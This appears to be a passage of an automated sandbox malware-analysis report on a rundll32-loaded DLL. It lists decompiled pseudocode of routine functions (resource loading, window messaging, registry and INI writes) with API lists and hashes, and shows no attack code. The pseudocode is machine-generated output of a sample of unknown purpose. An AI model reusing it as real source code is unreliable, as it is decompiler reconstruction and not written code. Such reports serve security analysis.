                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000C8AD
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000C8B5
                                                                                                        • LockResource.KERNEL32(00000000), ref: 1000C8C7
                                                                                                        • FreeResource.KERNEL32(00000000), ref: 1000C911
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1078018258-0
                                                                                                        • Opcode ID: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
                                                                                                        • Instruction ID: fb1a28c5f31200e3abd4209bdb6f3add133a5505808a0a6cde1b54a47ab738f1
                                                                                                        • Opcode Fuzzy Hash: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
                                                                                                        • Instruction Fuzzy Hash: 46118F3150076AEFE710DF95C889AAAB3F5FF003D5F218029E84252594D770ED50D760
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E1000ADB5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* _t37;
                                                                                                        				intOrPtr _t43;
                                                                                                        				void* _t45;
                                                                                                        				intOrPtr* _t51;
                                                                                                        				void* _t52;
                                                                                                        				void* _t53;
                                                                                                        
                                                                                                        				_t53 = __eflags;
                                                                                                        				_t46 = __ecx;
                                                                                                        				_t44 = __ebx;
                                                                                                        				_push(4);
                                                                                                        				E10017BC1(E10027E86, __ebx, __edi, __esi);
                                                                                                        				_t51 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
                                                                                                        				E1000B862(__ebx, __ecx, __edi, __ecx, _t53);
                                                                                                        				_t54 =  *((intOrPtr*)(_t52 + 8));
                                                                                                        				 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                        				 *_t51 = 0x10029f54;
                                                                                                        				if( *((intOrPtr*)(_t52 + 8)) == 0) {
                                                                                                        					 *((intOrPtr*)(_t51 + 0x50)) = 0;
                                                                                                        				} else {
                                                                                                        					_t43 = E1001817A( *((intOrPtr*)(_t52 + 8)));
                                                                                                        					_pop(_t46);
                                                                                                        					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
                                                                                                        				}
                                                                                                        				_t45 = E1000D5EC(_t44, 0, _t51, _t54);
                                                                                                        				_t55 = _t45;
                                                                                                        				if(_t45 == 0) {
                                                                                                        					L4:
                                                                                                        					E1000A0DB(_t45, _t46, 0, _t51, _t55);
                                                                                                        				}
                                                                                                        				_t7 = _t45 + 0x74; // 0x74
                                                                                                        				_t46 = _t7;
                                                                                                        				_t37 = E1000AA21(_t45, _t7, 0, _t51, _t55);
                                                                                                        				if(_t37 == 0) {
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				 *((intOrPtr*)(_t37 + 4)) = _t51;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
                                                                                                        				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
                                                                                                        				 *((intOrPtr*)(_t45 + 4)) = _t51;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x44)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x64)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x68)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x54)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x60)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x88)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x58)) = 0;
                                                                                                        				 *((short*)(_t51 + 0x92)) = 0;
                                                                                                        				 *((short*)(_t51 + 0x90)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x48)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x80)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x84)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x70)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x74)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x94)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
                                                                                                        				return E10017C60(_t51);
                                                                                                        			}









                                                                                                        0x1000adb5
                                                                                                        0x1000adb5
                                                                                                        0x1000adb5
                                                                                                        0x1000adb5
                                                                                                        0x1000adbc
                                                                                                        0x1000adc1
                                                                                                        0x1000adc3
                                                                                                        0x1000adc6
                                                                                                        0x1000adcd
                                                                                                        0x1000add0
                                                                                                        0x1000add3
                                                                                                        0x1000add9
                                                                                                        0x1000ade9
                                                                                                        0x1000addb
                                                                                                        0x1000adde
                                                                                                        0x1000ade3
                                                                                                        0x1000ade4
                                                                                                        0x1000ade4
                                                                                                        0x1000adf1
                                                                                                        0x1000adf3
                                                                                                        0x1000adf5
                                                                                                        0x1000adf7
                                                                                                        0x1000adf7
                                                                                                        0x1000adf7
                                                                                                        0x1000adfc
                                                                                                        0x1000adfc
                                                                                                        0x1000adff
                                                                                                        0x1000ae06
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ae08
                                                                                                        0x1000ae11
                                                                                                        0x1000ae1a
                                                                                                        0x1000ae1d
                                                                                                        0x1000ae20
                                                                                                        0x1000ae23
                                                                                                        0x1000ae26
                                                                                                        0x1000ae29
                                                                                                        0x1000ae2c
                                                                                                        0x1000ae2f
                                                                                                        0x1000ae32
                                                                                                        0x1000ae38
                                                                                                        0x1000ae3b
                                                                                                        0x1000ae42
                                                                                                        0x1000ae49
                                                                                                        0x1000ae4c
                                                                                                        0x1000ae52
                                                                                                        0x1000ae58
                                                                                                        0x1000ae5e
                                                                                                        0x1000ae61
                                                                                                        0x1000ae64
                                                                                                        0x1000ae6a
                                                                                                        0x1000ae70
                                                                                                        0x1000ae73
                                                                                                        0x1000ae76
                                                                                                        0x1000ae87

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1000ADBC
                                                                                                          • Part of subcall function 1000B862: __EH_prolog3.LIBCMT ref: 1000B869
                                                                                                        • __strdup.LIBCMT ref: 1000ADDE
                                                                                                        • GetCurrentThread.KERNEL32 ref: 1000AE0B
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1000AE14
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                        • String ID:
                                                                                                        • API String ID: 4206445780-0
                                                                                                        • Opcode ID: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
                                                                                                        • Instruction ID: f8307bcc4145d2f3034cc24c4785684ef343d47fe4738e0b5029f7ba663f9659
                                                                                                        • Opcode Fuzzy Hash: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
                                                                                                        • Instruction Fuzzy Hash: 88217EB4800B50CFE721DF6A858564AFBF8FFA4680F10891FD59A87A25CBB0A581CF45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 84%
                                                                                                        			E1001170E(intOrPtr* __ecx) {
                                                                                                        				char _v20;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				intOrPtr* __esi;
                                                                                                        				struct HWND__* _t18;
                                                                                                        				void* _t24;
                                                                                                        				intOrPtr _t29;
                                                                                                        				intOrPtr* _t33;
                                                                                                        
                                                                                                        				_t28 = __ecx;
                                                                                                        				_push(0);
                                                                                                        				_t33 = __ecx;
                                                                                                        				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
                                                                                                        					__eax =  *__esi;
                                                                                                        					__ecx = __esi;
                                                                                                        					__eax =  *((intOrPtr*)( *__esi + 0x170))();
                                                                                                        				}
                                                                                                        				_t30 = SendMessageA;
                                                                                                        				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                        				E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                        				_t28 = _t33;
                                                                                                        				_t33 = E10010DEC(0, _t28, SendMessageA);
                                                                                                        				if(_t33 != 0) {
                                                                                                        					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                        					E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                        					_t18 = GetCapture();
                                                                                                        					if(_t18 != 0) {
                                                                                                        						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
                                                                                                        					}
                                                                                                        					return _t18;
                                                                                                        				} else {
                                                                                                        					_push(_t28);
                                                                                                        					_v20 = 0x10057298;
                                                                                                        					E10017C83( &_v20, 0x1002e2fc);
                                                                                                        					asm("int3");
                                                                                                        					_push(4);
                                                                                                        					E10017BC1(E10027DEC, 0, SendMessageA, _t33);
                                                                                                        					_t29 = E10013965(0x104);
                                                                                                        					_v32 = _t29;
                                                                                                        					_t24 = 0;
                                                                                                        					_v20 = 0;
                                                                                                        					if(_t29 != 0) {
                                                                                                        						_t24 = E1000CF71(_t29);
                                                                                                        					}
                                                                                                        					return E10017C60(_t24);
                                                                                                        				}
                                                                                                        			}












                                                                                                        0x1001170e
                                                                                                        0x1001170e
                                                                                                        0x10011710
                                                                                                        0x1001171d
                                                                                                        0x1001171f
                                                                                                        0x10011721
                                                                                                        0x10011723
                                                                                                        0x10011723
                                                                                                        0x10011729
                                                                                                        0x10011738
                                                                                                        0x10011745
                                                                                                        0x1001174a
                                                                                                        0x10011751
                                                                                                        0x10011755
                                                                                                        0x10011763
                                                                                                        0x10011770
                                                                                                        0x10011775
                                                                                                        0x1001177d
                                                                                                        0x10011784
                                                                                                        0x10011784
                                                                                                        0x10011789
                                                                                                        0x10011757
                                                                                                        0x1000a0de
                                                                                                        0x1000a0e8
                                                                                                        0x1000a0ef
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f5
                                                                                                        0x1000a0fc
                                                                                                        0x1000a10b
                                                                                                        0x1000a10d
                                                                                                        0x1000a110
                                                                                                        0x1000a114
                                                                                                        0x1000a117
                                                                                                        0x1000a119
                                                                                                        0x1000a119
                                                                                                        0x1000a123
                                                                                                        0x1000a123

                                                                                                        APIs
                                                                                                        • SendMessageA.USER32 ref: 10011738
                                                                                                        • SendMessageA.USER32 ref: 10011763
                                                                                                          • Part of subcall function 1001044A: GetTopWindow.USER32(00000000), ref: 10010458
                                                                                                        • GetCapture.USER32 ref: 10011775
                                                                                                        • SendMessageA.USER32 ref: 10011784
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$CaptureWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 729421689-0
                                                                                                        • Opcode ID: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
                                                                                                        • Instruction ID: c1fa24ad5068faa30316ff7830c17e6e1fa791912a80157e4ea929c0746033bf
                                                                                                        • Opcode Fuzzy Hash: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
                                                                                                        • Instruction Fuzzy Hash: EF012CB5350219BFF621AB608CC9FBA36ADEB487C4F010539F685AA1E2C6A19C415660
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E10013F17(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v24;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t13;
                                                                                                        				CHAR* _t21;
                                                                                                        				char* _t24;
                                                                                                        				intOrPtr _t28;
                                                                                                        				void* _t30;
                                                                                                        				signed int _t31;
                                                                                                        
                                                                                                        				_t28 = __edx;
                                                                                                        				_t13 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_v8 = _t13 ^ _t31;
                                                                                                        				_t24 = _a8;
                                                                                                        				_t30 = __ecx;
                                                                                                        				_t29 = _a4;
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                                                                        					E10016DF0( &_v24, 0x10, "%d", _a12);
                                                                                                        					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
                                                                                                        				} else {
                                                                                                        					_t30 = E10013ED1(__ecx, _t29);
                                                                                                        					if(_t30 != 0) {
                                                                                                        						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                                                                                                        						_t29 = _t21;
                                                                                                        						RegCloseKey(_t30);
                                                                                                        						_t18 = 0 | _t21 == 0x00000000;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E100167D5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                                                                                                        			}














                                                                                                        0x10013f17
                                                                                                        0x10013f1d
                                                                                                        0x10013f24
                                                                                                        0x10013f28
                                                                                                        0x10013f2c
                                                                                                        0x10013f33
                                                                                                        0x10013f36
                                                                                                        0x10013f76
                                                                                                        0x10013f87
                                                                                                        0x10013f38
                                                                                                        0x10013f3e
                                                                                                        0x10013f42
                                                                                                        0x10013f50
                                                                                                        0x10013f57
                                                                                                        0x10013f59
                                                                                                        0x10013f63
                                                                                                        0x10013f63
                                                                                                        0x10013f42
                                                                                                        0x10013f9b

                                                                                                        APIs
                                                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10013F50
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 10013F59
                                                                                                        • _swprintf.LIBCMT ref: 10013F76
                                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10013F87
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 4210924919-0
                                                                                                        • Opcode ID: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
                                                                                                        • Instruction ID: 30a1eb16c1be1d822a6ca59f9e75d62d608c78195c8382286e316af6553577e2
                                                                                                        • Opcode Fuzzy Hash: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
                                                                                                        • Instruction Fuzzy Hash: 25018076900219BBDB00DF648C85FAF77BCEF48754F104469FA01AB181DA74E94597A4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 91%
                                                                                                        			E1000B244(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				void* _t16;
                                                                                                        				int _t17;
                                                                                                        				int _t18;
                                                                                                        				struct HWND__* _t19;
                                                                                                        				intOrPtr _t25;
                                                                                                        				intOrPtr _t33;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_t32 = __edi;
                                                                                                        				_t35 = __ecx;
                                                                                                        				_t25 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                        				if(_t25 == 0) {
                                                                                                        					__eflags =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                        					if(__eflags == 0) {
                                                                                                        						L3:
                                                                                                        						_t17 = E1000A0DB(0, _t25, _t32, _t35, _t39);
                                                                                                        						L4:
                                                                                                        						asm("sbb edx, edx");
                                                                                                        						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
                                                                                                        						L11:
                                                                                                        						 *((intOrPtr*)(_t35 + 0x18)) = 1;
                                                                                                        						return _t18;
                                                                                                        					}
                                                                                                        					__eflags = _a4;
                                                                                                        					if(_a4 == 0) {
                                                                                                        						_push(__edi);
                                                                                                        						_t33 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                        						_t19 = GetFocus();
                                                                                                        						__eflags = _t19 -  *(_t33 + 0x20);
                                                                                                        						if(_t19 ==  *(_t33 + 0x20)) {
                                                                                                        							SendMessageA( *(E1000FB5C(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t18 = E10012913( *((intOrPtr*)(_t35 + 0x14)), _a4);
                                                                                                        					goto L11;
                                                                                                        				}
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                                                                        					_t17 =  *(__ecx + 8);
                                                                                                        					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                        					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                        						goto L4;
                                                                                                        					}
                                                                                                        					goto L3;
                                                                                                        				}
                                                                                                        				return _t16;
                                                                                                        			}












                                                                                                        0x1000b244
                                                                                                        0x1000b246
                                                                                                        0x1000b248
                                                                                                        0x1000b24f
                                                                                                        0x1000b284
                                                                                                        0x1000b287
                                                                                                        0x1000b25e
                                                                                                        0x1000b25e
                                                                                                        0x1000b263
                                                                                                        0x1000b269
                                                                                                        0x1000b27c
                                                                                                        0x1000b2c7
                                                                                                        0x1000b2c7
                                                                                                        0x00000000
                                                                                                        0x1000b2c7
                                                                                                        0x1000b289
                                                                                                        0x1000b28d
                                                                                                        0x1000b28f
                                                                                                        0x1000b290
                                                                                                        0x1000b293
                                                                                                        0x1000b299
                                                                                                        0x1000b29c
                                                                                                        0x1000b2b4
                                                                                                        0x1000b2b4
                                                                                                        0x1000b2ba
                                                                                                        0x1000b2c2
                                                                                                        0x00000000
                                                                                                        0x1000b2c2
                                                                                                        0x1000b254
                                                                                                        0x1000b256
                                                                                                        0x1000b259
                                                                                                        0x1000b25c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000b25c
                                                                                                        0x1000b2d0

                                                                                                        APIs
                                                                                                        • EnableMenuItem.USER32 ref: 1000B27C
                                                                                                          • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                        • GetFocus.USER32 ref: 1000B293
                                                                                                        • GetParent.USER32(?), ref: 1000B2A1
                                                                                                        • SendMessageA.USER32 ref: 1000B2B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3849708097-0
                                                                                                        • Opcode ID: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
                                                                                                        • Instruction ID: 6f1bf2e13571d4607552996c72993327e3919edcc1f96bcd7a145644f4ad6856
                                                                                                        • Opcode Fuzzy Hash: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
                                                                                                        • Instruction Fuzzy Hash: FB115B71500A11AFE720DF64CCC9D1EBBF6FF893A5B118A2DF186869A8C731AC45CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E1001044A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HWND__* _t16;
                                                                                                        				struct HWND__* _t18;
                                                                                                        				struct HWND__* _t20;
                                                                                                        				void* _t22;
                                                                                                        				void* _t23;
                                                                                                        				void* _t24;
                                                                                                        				struct HWND__* _t25;
                                                                                                        
                                                                                                        				_t23 = __ecx;
                                                                                                        				_t22 = __ebx;
                                                                                                        				_t24 = GetTopWindow;
                                                                                                        				_t16 = GetTopWindow(_a4);
                                                                                                        				while(1) {
                                                                                                        					_t25 = _t16;
                                                                                                        					if(_t25 == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					__eflags = _a24;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						SendMessageA(_t25, _a8, _a12, _a16);
                                                                                                        					} else {
                                                                                                        						_t20 = E1000FB83(_t23, _t24, _t25, __eflags, _t25);
                                                                                                        						__eflags = _t20;
                                                                                                        						if(__eflags != 0) {
                                                                                                        							_push(_a16);
                                                                                                        							_push(_a12);
                                                                                                        							_push(_a8);
                                                                                                        							_push( *((intOrPtr*)(_t20 + 0x20)));
                                                                                                        							_push(_t20);
                                                                                                        							E1001016F(_t22, _t24, _t25, __eflags);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					__eflags = _a20;
                                                                                                        					if(_a20 != 0) {
                                                                                                        						_t18 = GetTopWindow(_t25);
                                                                                                        						__eflags = _t18;
                                                                                                        						if(_t18 != 0) {
                                                                                                        							E1001044A(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t16 = GetWindow(_t25, 2);
                                                                                                        				}
                                                                                                        				return _t16;
                                                                                                        			}













                                                                                                        0x1001044a
                                                                                                        0x1001044a
                                                                                                        0x10010452
                                                                                                        0x10010458
                                                                                                        0x100104bb
                                                                                                        0x100104bb
                                                                                                        0x100104bf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001045c
                                                                                                        0x10010460
                                                                                                        0x1001048a
                                                                                                        0x10010462
                                                                                                        0x10010463
                                                                                                        0x10010468
                                                                                                        0x1001046a
                                                                                                        0x1001046c
                                                                                                        0x1001046f
                                                                                                        0x10010472
                                                                                                        0x10010475
                                                                                                        0x10010478
                                                                                                        0x10010479
                                                                                                        0x10010479
                                                                                                        0x1001046a
                                                                                                        0x10010490
                                                                                                        0x10010494
                                                                                                        0x10010497
                                                                                                        0x10010499
                                                                                                        0x1001049b
                                                                                                        0x100104ad
                                                                                                        0x100104ad
                                                                                                        0x1001049b
                                                                                                        0x100104b5
                                                                                                        0x100104b5
                                                                                                        0x100104c4

                                                                                                        APIs
                                                                                                        • GetTopWindow.USER32(00000000), ref: 10010458
                                                                                                        • GetTopWindow.USER32(00000000), ref: 10010497
                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 100104B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window
                                                                                                        • String ID:
                                                                                                        • API String ID: 2353593579-0
                                                                                                        • Opcode ID: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
                                                                                                        • Instruction ID: cb0d0bbe13ee34529c330f041d0b53c98759dff42d13bab1c22f515cd31b8fc3
                                                                                                        • Opcode Fuzzy Hash: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
                                                                                                        • Instruction Fuzzy Hash: CD01257620061ABBDF12DF908C44E9F3A6AEF08390F018014FE8458060C7B6D9A2EBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100223DD(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                        				intOrPtr _t25;
                                                                                                        				void* _t26;
                                                                                                        				void* _t28;
                                                                                                        				void* _t29;
                                                                                                        
                                                                                                        				_t28 = __ebx;
                                                                                                        				_t25 = _a16;
                                                                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                        					_t26 = E10021CDA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                        					goto L9;
                                                                                                        				} else {
                                                                                                        					_t35 = _t25 - 0x66;
                                                                                                        					if(_t25 != 0x66) {
                                                                                                        						__eflags = _t25 - 0x61;
                                                                                                        						if(_t25 == 0x61) {
                                                                                                        							L7:
                                                                                                        							_t26 = E10021DC6(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                        						} else {
                                                                                                        							__eflags = _t25 - 0x41;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								goto L7;
                                                                                                        							} else {
                                                                                                        								_t26 = E100222E5(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						L9:
                                                                                                        						return _t26;
                                                                                                        					} else {
                                                                                                        						return E1002222C(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}







